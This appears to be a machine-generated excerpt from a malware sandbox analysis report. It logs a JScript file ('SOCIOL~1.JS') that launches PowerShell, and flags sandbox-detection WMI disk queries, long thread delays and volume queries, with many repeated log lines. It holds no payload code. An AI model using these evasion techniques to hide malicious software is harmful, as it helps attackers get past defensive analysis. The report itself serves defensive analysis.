Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk WHERE DeviceId='D:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5096Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4805Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6424Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3340Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6436Thread sleep count: 5096 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6436Thread sleep count: 4805 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5640Thread sleep time: -8301034833169293s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3876Thread sleep count: 6424 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3876Thread sleep count: 3340 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2724Thread sleep time: -8301034833169293s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "SOCIOL~1.JS"Jump to behavior
Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershellJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "SOCIOL~1.JS"
Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershellJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
